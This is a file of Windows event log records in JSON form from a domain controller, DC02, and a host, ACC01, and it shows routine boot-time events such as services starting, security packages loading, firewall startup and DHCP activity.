{"EventTime":"2021-09-21T13:02:52.604389+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":20,"SourceName":"Microsoft-Windows-Kernel-Boot","ProviderGuid":"{15CA44FF-4D7A-4BAA-BBA5-0998955E531E}","Version":1,"TaskValue":31,"OpcodeValue":0,"RecordNumber":169966,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The last shutdown's success status was true. The last boot's success status was true.","Opcode":"Info","LastShutdownGood":"true","LastBootGood":"true","LastBootId":"31","BootStatusPolicy":"2","EventReceivedTime":"2021-09-21T13:03:49.020278+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:26.712421+05:45","Hostname":"DC02.prod.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":32,"SourceName":"Microsoft-Windows-TerminalServices-LocalSessionManager","ProviderGuid":"{5D896912-022D-40AA-A3A8-4FA5515C76D7}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":727,"ExecutionProcessID":940,"ExecutionThreadID":956,"Channel":"Microsoft-Windows-TerminalServices-LocalSessionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Plugin RDSAppXPlugin has been successfully initialized","Opcode":"Info","EventXML.messageName":"RDSAppXPlugin","EventReceivedTime":"2021-09-21T13:03:48.637987+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.493342+05:45","Hostname":"DC02.prod.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":20523,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":302,"ActivityID":"{F4624863-5010-4535-90FF-056E4EC70000}","ExecutionProcessID":344,"ExecutionThreadID":1100,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"NETWORK SERVICE","UserID":"S-1-5-20","AccountType":"Well Known Group","Message":"Connection from listener RDP-Tcp will have terminal class of {5828227c-20cf-4408-b73f-73ab70b8849f}","Opcode":"Info","EventXML.ListenerName":"RDP-Tcp","EventXML.Class":"{5828227c-20cf-4408-b73f-73ab70b8849f}","EventReceivedTime":"2021-09-21T13:03:49.761640+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.172661+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6005,"SourceName":"EventLog","TaskValue":0,"RecordNumber":169956,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The Event log service was started.","EventData.Binary":"E507090002001500070012001C00AC000000000000000000","EventReceivedTime":"2021-09-21T13:03:48.808556+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:52.604446+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":27,"SourceName":"Microsoft-Windows-Kernel-Boot","ProviderGuid":"{15CA44FF-4D7A-4BAA-BBA5-0998955E531E}","Version":1,"TaskValue":33,"OpcodeValue":0,"RecordNumber":169968,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The boot type was 0x0.","Opcode":"Info","BootType":"0","LoadOptions":" NOEXECUTE=OPTOUT","EventReceivedTime":"2021-09-21T13:03:49.051054+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:52.604493+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":18,"SourceName":"Microsoft-Windows-Kernel-Boot","ProviderGuid":"{15CA44FF-4D7A-4BAA-BBA5-0998955E531E}","Version":0,"TaskValue":57,"OpcodeValue":0,"RecordNumber":169969,"ExecutionProcessID":4,"ExecutionThreadID":8,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"There are 0x1 boot options on this system.","Opcode":"Info","EntryCount":"1","EventReceivedTime":"2021-09-21T13:03:49.051054+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:00:23.449471+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":6008,"SourceName":"EventLog","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56098,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"The previous system shutdown at 8:17:56 PM on ???9/???16/???2021 was unexpected.","Data":"8:17:56 PM","Data_1":"???9/???16/???2021","Data_2":"6060001","EventData.Binary":"E5070900040010001400110038000902E5070900040010000E00200038000902600900003C000000010000006009000001000000B00400000000000000000000","EventReceivedTime":"2021-09-21T13:03:39.653409+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:49.964759+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":781,"SourceName":"Microsoft-Windows-Complus","ProviderGuid":"{0F177893-4A9C-4709-B921-F432D67F43D5}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":109824,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The COM+ sub system is suppressing duplicate event log entries for a duration of 86400 seconds. The suppression timeout can be controlled by a REG_DWORD value named SuppressDuplicateDuration under the following registry key: HKLM\\Software\\Microsoft\\COM3\\Eventlog.","param1":"86400","param2":"SuppressDuplicateDuration","param3":"Software\\Microsoft\\COM3\\Eventlog","EventReceivedTime":"2021-09-21T13:03:52.917882+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:30.975261+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5615,"SourceName":"Microsoft-Windows-WMI","ProviderGuid":"{1EDEEE53-0AFE-4609-B846-D8C0B2075B1F}","Version":2,"TaskValue":0,"OpcodeValue":0,"RecordNumber":109815,"ExecutionProcessID":2032,"ExecutionThreadID":1464,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Windows Management Instrumentation Service started sucessfully","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:50.261633+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:53.355385+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":4202,"SourceName":"Microsoft-Windows-MSDTC 2","ProviderGuid":"{5D9E0020-3761-4F36-90C8-38CE6511BD12}","Version":0,"TaskValue":2,"OpcodeValue":0,"RecordNumber":109827,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"MSDTC started with the following settings:\r\r Security Configuration (OFF = 0 and ON = 1):\r Allow Remote Administrator = 0,\r Network Clients = 0,\r Transaction Manager Communication: \r Allow Inbound Transactions = 0,\r Allow Outbound Transactions = 0,\r Transaction Internet Protocol (TIP) = 0,\r Enable XA Transactions = 0,\r Enable SNA LU 6.2 Transactions = 1,\r MSDTC Communications Security = Mutual Authentication Required,\r Account = NT AUTHORITY\\NetworkService,\r Firewall Exclusion Detected = 0\r\r Transaction Bridge Installed = 0\r Filtering Duplicate Events = 1\r","Category":"TM","param1":"0","param2":"0","param3":"0","param4":"0","param5":"0","param6":"0","param7":"1","param8":"Mutual Authentication Required","param9":"NT AUTHORITY\\NetworkService","param10":"0","param11":"0","param12":"1","EventReceivedTime":"2021-09-21T13:03:54.388872+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:40.872162+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":642,"SourceName":"ESENT","Version":0,"TaskValue":1,"OpcodeValue":0,"RecordNumber":153449,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Catalog Database (1348,D,12) Catalog Database: The database format feature version 9080 (0x2378) could not be used due to the current database format 1568.20.0, controlled by the parameter 0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat).","Category":"General","Opcode":"Info","Data":"Catalog Database","Data_1":"1348,D,12","Data_2":"Catalog Database: ","Data_3":"0x410022D8 (8920 | JET_efvAllowHigherPersistedFormat)","Data_4":"9080 (0x2378)","Data_5":"1568.20.0","EventReceivedTime":"2021-09-21T13:03:41.028406+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.172661+05:45","Hostname":"DC02.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":6009,"SourceName":"EventLog","TaskValue":0,"RecordNumber":169955,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":"Microsoft (R) Windows (R) 10.00. 17763 Multiprocessor Free.","Data":"10.00.","Data_1":"17763","Data_2":"Multiprocessor Free","Data_3":"0","EventReceivedTime":"2021-09-21T13:03:48.808556+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:32.198233+05:45","Hostname":"DC02.prod.corp.local","Keywords":"1152921504606846976","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1136,"SourceName":"Microsoft-Windows-TerminalServices-RemoteConnectionManager","ProviderGuid":"{C76BAA63-AE81-421C-B425-340B4B24157F}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":304,"ExecutionProcessID":2412,"ExecutionThreadID":2440,"Channel":"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"RD Session Host Server role is not installed.","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:50.292887+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:29.248944+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1531,"SourceName":"Microsoft-Windows-User Profiles Service","ProviderGuid":"{89B1E9F0-5AFF-44A6-9B44-0A07A7CE5845}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":109814,"ExecutionProcessID":1548,"ExecutionThreadID":1640,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The User Profile Service has started successfully. \r\n\r\n","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:50.089757+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:58.998639+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775810","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":98,"SourceName":"Microsoft-Windows-Ntfs","ProviderGuid":"{3FF37A1C-A68D-4D6E-8C9B-F79E8B16C482}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":169981,"ExecutionProcessID":4,"ExecutionThreadID":224,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Volume \\\\?\\Volume{7697e2b0-0000-0000-0000-100000000000} (\\Device\\HarddiskVolume1) is healthy. No action is needed.","Opcode":"Info","DriveName":"\\\\?\\Volume{7697e2b0-0000-0000-0000-100000000000}","DeviceName":"\\Device\\HarddiskVolume1","CorruptionActionState":"0","EventReceivedTime":"2021-09-21T13:03:49.464754+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:59.210183+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854776836","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":172,"SourceName":"Microsoft-Windows-Kernel-Power","ProviderGuid":"{331C3B3A-2005-44C2-AC5E-77220C37D6B4}","Version":0,"TaskValue":203,"OpcodeValue":0,"RecordNumber":169982,"ExecutionProcessID":4,"ExecutionThreadID":180,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Connectivity state in standby: Disconnected, Reason: NIC compliance","Opcode":"Info","State":"2","Reason":"6","EventReceivedTime":"2021-09-21T13:03:49.496008+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:25.043988+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16977,"SourceName":"Microsoft-Windows-Directory-Services-SAM","ProviderGuid":"{0D4FDC09-8C27-494A-BDA0-505E4FD8ADAE}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":169994,"ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The domain is configured with the following minimum password length-related settings.\r\n\r\nMinimumPasswordLength: 8\r\n\r\nMinimumPasswordLengthAudit: -1\r\n\r\nFor more information see https://go.microsoft.com/fwlink/?LinkId=2097191.\r\n","Opcode":"Info","EventData.Name":"SAMMSG_MINPWDLEN_SETTINGS_IN_EFFECT","MinimumPasswordLength":"8","MinimumPasswordLengthAudit":"-1","EventReceivedTime":"2021-09-21T13:03:49.621007+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:15.980218+05:45","Hostname":"DC02.prod.corp.local","Keywords":"4611686018427387904","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":14,"SourceName":"Microsoft-Windows-Wininit","ProviderGuid":"{206F6DEA-D3C5-4D10-BC72-989F03C8B84B}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":169991,"ExecutionProcessID":488,"ExecutionThreadID":492,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Credential Guard configuration: 0x0, 0","Opcode":"Info","Config":"0","IsTestConfig":"0","EventReceivedTime":"2021-09-21T13:03:49.574981+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:00:26.558866+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"4620693217682128896","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":1101,"SourceName":"Microsoft-Windows-Eventlog","ProviderGuid":"{FC65DDD8-D6EF-4962-83D5-6E5CFE9CE148}","Version":0,"TaskValue":101,"OpcodeValue":0,"RecordNumber":876429,"ExecutionProcessID":1220,"ExecutionThreadID":2180,"Channel":"Security","Message":"Audit events have been dropped by the transport. 0","Category":"Event processing","Opcode":"Info","AuditEventsDropped.Reason":"0","EventReceivedTime":"2021-09-21T13:03:42.309665+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:18.011839+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4622,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":3555523,"ActivityID":"{CA825B74-AEB8-0001-365C-82CAB8AED701}","ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"Security","Message":"A security package has been loaded by the Local Security Authority.\r\n\r\nSecurity Package Name:\tC:\\Windows\\system32\\msv1_0.DLL : NTLM","Category":"Security System Extension","Opcode":"Info","SecurityPackageName":"C:\\Windows\\system32\\msv1_0.DLL : NTLM","EventReceivedTime":"2021-09-21T13:03:48.216339+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.056710+05:45","Hostname":"DC02.prod.corp.local","Keywords":"2305843009213693952","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":50103,"SourceName":"Microsoft-Windows-Dhcp-Client","ProviderGuid":"{15A7A4F8-0072-4EAB-ABAD-F98A4D666AED}","Version":0,"TaskValue":4,"OpcodeValue":129,"RecordNumber":170011,"ExecutionProcessID":1144,"ExecutionThreadID":1200,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"DHCPv4 client registered for shutdown notification","Category":"Service State Event","Opcode":"ServiceShutdown","EventReceivedTime":"2021-09-21T13:03:49.732832+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:25.043440+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4614,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":3555538,"ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"Security","Message":"A notification package has been loaded by the Security Account Manager.\r\nThis package will be notified of any account or password changes.\r\n\r\nNotification Package Name:\tscecli","Category":"Security System Extension","Opcode":"Info","NotificationPackageName":"scecli","EventReceivedTime":"2021-09-21T13:03:48.261636+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:59.250851+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4826,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13573,"OpcodeValue":0,"RecordNumber":3555506,"ExecutionProcessID":4,"ExecutionThreadID":32,"Channel":"Security","Message":"Boot Configuration Data loaded.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGeneral Settings:\r\n\tLoad Options:\t\t-\r\n\tAdvanced Options:\t\tNo\r\n\tConfiguration Access Policy:\tDefault\r\n\tSystem Event Logging:\tNo\r\n\tKernel Debugging:\tNo\r\n\tVSM Launch Type:\tOff\r\n\r\nSignature Settings:\r\n\tTest Signing:\t\tNo\r\n\tFlight Signing:\t\tNo\r\n\tDisable Integrity Checks:\tNo\r\n\r\nHyperVisor Settings:\r\n\tHyperVisor Load Options:\t-\r\n\tHyperVisor Launch Type:\tOff\r\n\tHyperVisor Debugging:\tNo","Category":"Other Policy Change Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x3e7","LoadOptions":"-","AdvancedOptions":"%%1843","ConfigAccessPolicy":"%%1846","RemoteEventLogging":"%%1843","KernelDebug":"%%1843","VsmLaunchType":"%%1848","TestSigning":"%%1843","FlightSigning":"%%1843","DisableIntegrityChecks":"%%1843","HypervisorLoadOptions":"-","HypervisorLaunchType":"%%1848","HypervisorDebug":"%%1843","EventReceivedTime":"2021-09-21T13:03:48.216339+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:18.888156+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4610,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12289,"OpcodeValue":0,"RecordNumber":3555530,"ActivityID":"{CA825B74-AEB8-0001-365C-82CAB8AED701}","ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"Security","Message":"An authentication package has been loaded by the Local Security Authority.\r\nThis authentication package will be used to authenticate logon attempts.\r\n\r\nAuthentication Package Name:\tC:\\Windows\\system32\\msv1_0.DLL : MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","Category":"Security System Extension","Opcode":"Info","AuthenticationPackageName":"C:\\Windows\\system32\\msv1_0.DLL : MICROSOFT_AUTHENTICATION_PACKAGE_V1_0","EventReceivedTime":"2021-09-21T13:03:48.216339+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:30.943181+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5033,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12292,"OpcodeValue":0,"RecordNumber":3555681,"ExecutionProcessID":4,"ExecutionThreadID":312,"Channel":"Security","Message":"The Windows Firewall Driver started successfully.","Category":"Other System Events","Opcode":"Info","EventReceivedTime":"2021-09-21T13:03:50.250479+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:35.806111+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":5142,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12808,"OpcodeValue":0,"RecordNumber":3555964,"ExecutionProcessID":4,"ExecutionThreadID":184,"Channel":"Security","Message":"A network share object was added.\r\n\t\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC02$\r\n\tAccount Domain:\t\tPROD\r\n\tLogon ID:\t\t0x3E7\r\n\r\nShare Information:\t\r\n\tShare Name:\t\t\\\\*\\SYSVOL\r\n\tShare Path:\t\tC:\\Windows\\SYSVOL\\sysvol","Category":"File Share","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC02$","SubjectDomainName":"PROD","SubjectLogonId":"0x3e7","ShareName":"\\\\*\\SYSVOL","ShareLocalPath":"C:\\Windows\\SYSVOL\\sysvol","EventReceivedTime":"2021-09-21T13:03:50.542886+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:32.821602+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":4953,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":3555707,"ActivityID":"{CA825B74-AEB8-0001-365C-82CAB8AED701}","ExecutionProcessID":628,"ExecutionThreadID":8,"Channel":"Security","Message":"Windows Firewall ignored a rule because it could not be parsed.\r\n\t\r\nProfile:\tAll\r\n\r\nReason for Rejection:\tAn error occurred.\r\n\r\nRule:\r\n\tID:\tWMPNetworkSvc-2\r\n\tName:\t-","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","Profile":"All","ReasonForRejection":"An error occurred.","RuleId":"WMPNetworkSvc-2","RuleName":"-","EventReceivedTime":"2021-09-21T13:03:50.324138+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:51.917886+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9259400833873739776","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7026,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":170080,"ExecutionProcessID":608,"ExecutionThreadID":612,"Channel":"System","Message":"The following boot-start or system-start driver(s) did not load: \r\ndam","param1":"\ndam","EventReceivedTime":"2021-09-21T13:03:53.285783+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:39.592834+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4945,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":876637,"ActivityID":"{63A5CF36-AEB8-0000-A6CF-A563B8AED701}","ExecutionProcessID":672,"ExecutionThreadID":728,"Channel":"Security","Message":"A rule was listed when the Windows Firewall started.\r\n\t\r\nProfile used:\tPublic\r\n\r\nRule:\r\n\tRule ID:\tCoreNet-ICMP6-PP-Out\r\n\tRule Name:\tCore Networking - Parameter Problem (ICMPv6-Out)","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileUsed":"Public","RuleId":"CoreNet-ICMP6-PP-Out","RuleName":"Core Networking - Parameter Problem (ICMPv6-Out)","EventReceivedTime":"2021-09-21T13:03:42.684658+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:02:59.773523+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":55,"SourceName":"Microsoft-Windows-Kernel-Processor-Power","ProviderGuid":"{0F67E49F-FE51-4E9F-B490-6F2948CC6027}","Version":0,"TaskValue":47,"OpcodeValue":0,"RecordNumber":169984,"ExecutionProcessID":4,"ExecutionThreadID":256,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Processor 1 in group 0 exposes the following power management capabilities:\r\n\r\nIdle state type: ACPI Idle (C) States (1 state(s))\r\n\r\nPerformance state type: ACPI Performance (P) / Throttle (T) States\r\nNominal Frequency (MHz): 2100\r\nMaximum performance percentage: 100\r\nMinimum performance percentage: 100\r\nMinimum throttle percentage: 12","Opcode":"Info","Group":"0","Number":"1","IdleStateCount":"1","IdleImplementation":"1","NominalFrequency":"2100","MaximumPerformancePercent":"100","MinimumPerformancePercent":"100","MinimumThrottlePercent":"12","PerformanceImplementation":"1","EventReceivedTime":"2021-09-21T13:03:49.527256+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:19.461888+05:45","Hostname":"DC02.prod.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16962,"SourceName":"Microsoft-Windows-Directory-Services-SAM","ProviderGuid":"{0D4FDC09-8C27-494A-BDA0-505E4FD8ADAE}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":169992,"ActivityID":"{CA825B74-AEB8-0001-365C-82CAB8AED701}","ExecutionProcessID":628,"ExecutionThreadID":632,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Remote calls to the SAM database are being restricted using the default security descriptor: .\r\nFor more information please see http://go.microsoft.com/fwlink/?LinkId=787651.","Opcode":"Info","EventData.Name":"SAMMSG_RESTRICT_REMOTE_SAM_DEFAULT_SD","EventReceivedTime":"2021-09-21T13:03:49.621007+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-09-21T13:03:28.056374+05:45","Hostname":"DC02.prod.corp.local","Keywords":"2305843009213693952","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":50036,"SourceName":"Microsoft-Windows-Dhcp-Client","ProviderGuid":"{15A7A4F8-0072-4EAB-ABAD-F98A4D666AED}","Version":0,"TaskValue":4,"OpcodeValue":68,"RecordNumber":170010,"ExecutionProcessID":1144,"ExecutionThreadID":1200,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"DHCPv4 client service is started","Category":"Service State Event","Opcode":"ServiceStart","EventReceivedTime":"2021-09-21T13:03:49.732832+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
